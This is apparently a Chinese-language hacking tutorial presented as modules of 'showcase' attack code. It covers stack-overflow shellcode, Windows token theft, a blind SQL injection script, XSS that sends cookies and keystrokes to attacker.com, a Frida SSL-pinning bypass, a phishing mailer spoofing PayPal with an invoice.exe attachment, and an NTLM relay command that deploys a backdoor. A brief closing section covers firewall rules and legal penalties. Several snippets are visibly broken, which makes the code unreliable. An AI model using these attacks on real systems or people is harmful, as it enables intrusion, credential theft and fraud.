模块一:系统层漏洞利用
1. 栈溢出攻击(Linux x86)
利用缓冲区溢出覆盖返回地址,实现权限提升。
// 生成Shellcode(execve /bin/sh)
char shellcode[] =
x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1xb0x0bxcdx80";
// 构造Payload:填充NOP雪橇 + Shellcode + 覆盖返回地址
char payload[500];
memset(payload, 0x90, 200); // NOP填充
memcpy(payload+200, shellcode, sizeof(shellcode));
memset(payload+300, "xbfxffxf6xff", 4); // 覆盖返回地址
适用场景:存在未限制输入长度的Linux服务程序(如老旧FTP服务)。
2. Windows提权漏洞(Token窃取)
通过注入进程窃取SYSTEM令牌,绕过UAC限制。
// 使用NtQuerySystemInformation获取系统进程句柄
NTSTATUS status = NtQuerySystemInformation(SystemProcessInformation, buffer, size, &retSize);
// 遍历进程列表,找到winlogon.exe并复制其Token
if (process->ProcessName == "winlogon.exe") {
OpenProcessToken(process->ProcessHandle, TOKEN_ALL_ACCESS, &hToken);
ImpersonateLoggedOnUser(hToken); // 提权成功
适用场景:Windows 10/11本地提权漏洞(需配合内核驱动加载)。
模块二:Web渗透炫技代码
1. SQL注入自动化探测(Python脚本)
利用布尔盲注快速提取数据库名:
python
import requests
url = "http://target.com/login.php
db_name =
for i in range(1,20):
for char in 'abcdefghijklmnopqrstuvwxyz':
payload = f"' OR (SELECT SUBSTRING(database,{i},1))='{char}' -
r = requests.post(url, data={'username':payload, 'password':'test'})
if "Welcome" in r.text:
db_name += char
break
print(f"Database: {db_name}")
适用场景:存在未过滤字符输入的登录接口。
2. XSS组合拳(Cookie劫持+键盘记录)
通过反射型XSS注入恶意脚本:
javascript
// 窃取Cookie并发送至攻击者服务器
var img = new Image;
img.src = 'http://attacker.com/steal?cookie=' + document.cookie;
// 键盘记录
document.onkeypress = function(e) {
fetch('http://attacker.com/keylog', {method: 'POST', body: e.key});
};
适用场景:存在未转义输出的评论或搜索功能。
模块三:密码破解与逆向工程
1. 彩虹表碰撞攻击(Hashcat命令)
使用GPU加速破解MD5哈希:
bash
hashcat -m 0 -a 3 5f4dcc3b5aa765d61d8327deb882cf99 ?a?a?a?a?a?a
参数说明:-m 0为MD5模式,-a 3为暴力破解,?a表示所有字符集。
2. Android APK逆向(Frida动态Hook)
绕过SSL Pinning并提取加密密钥:
javascript
// Frida脚本注入
Java.perform(function {
var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
X509TrustManager.checkServerTrusted.implementation = function {}; // 禁用证书校验
var SecretKey = Java.use('com.example.SecretKeyStore');
SecretKey.getKey.implementation = function {
send("Extracted Key: " + this.getKey);
return this.getKey;
};
});
适用场景:移动端应用敏感逻辑分析。
模块四:社会工程学与自动化工具
1. 钓鱼邮件生成(Python + SMTPLib)
伪装成客服发送恶意附件:
python
import smtplib
from email.mime.multipart import MIMEMultipart
msg = MIMEMultipart
msg['From'] = 'support@paypal.com'
msg['To'] = 'victim@example.com'
msg.attach(MIMEText("您的账户存在异常,请查看附件!"))
with open("invoice.exe", "rb") as f:
msg.attach(MIMEApplication(f.read, Name="invoice.exe"))
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls
server.login('fakeaccount@gmail.com', 'password')
server.send_message(msg)
防御提示:企业需部署邮件网关过滤可疑附件。
2. 内网横向移动(Impacket工具包)
利用NTLM Relay攻击获取域控权限:
bash
ntlmrelayx.py -t ldap://dc.example.com -wh attacker-wpad --deploy-backdoor
适用场景:域内存在未修复的SMB签名漏洞。
模块五:防御对抗与法律红线
bash
禁止ICMP重定向攻击
iptables -A INPUT -p icmp --icmp-type redirect -j DROP
限制SSH爆破尝试
iptables -A INPUT -p tcp --dport 22 -m recent --name ssh --update --seconds 60 --hitcount 3 -j DROP
引用案例:2024年浙江某医药公司因未配置防火墙遭勒索攻击,损失超千万。
公安部2024年典型案例显示,制作外挂程序(如医院挂号抢号器)可构成“破坏计算机信息系统罪”,最高判刑7年。
资源获取与风险提示
如需完整代码库或渗透工具链,可参考《黑客攻防技术宝典:系统实战篇》及CSDN博主“大白”的2025进阶教程。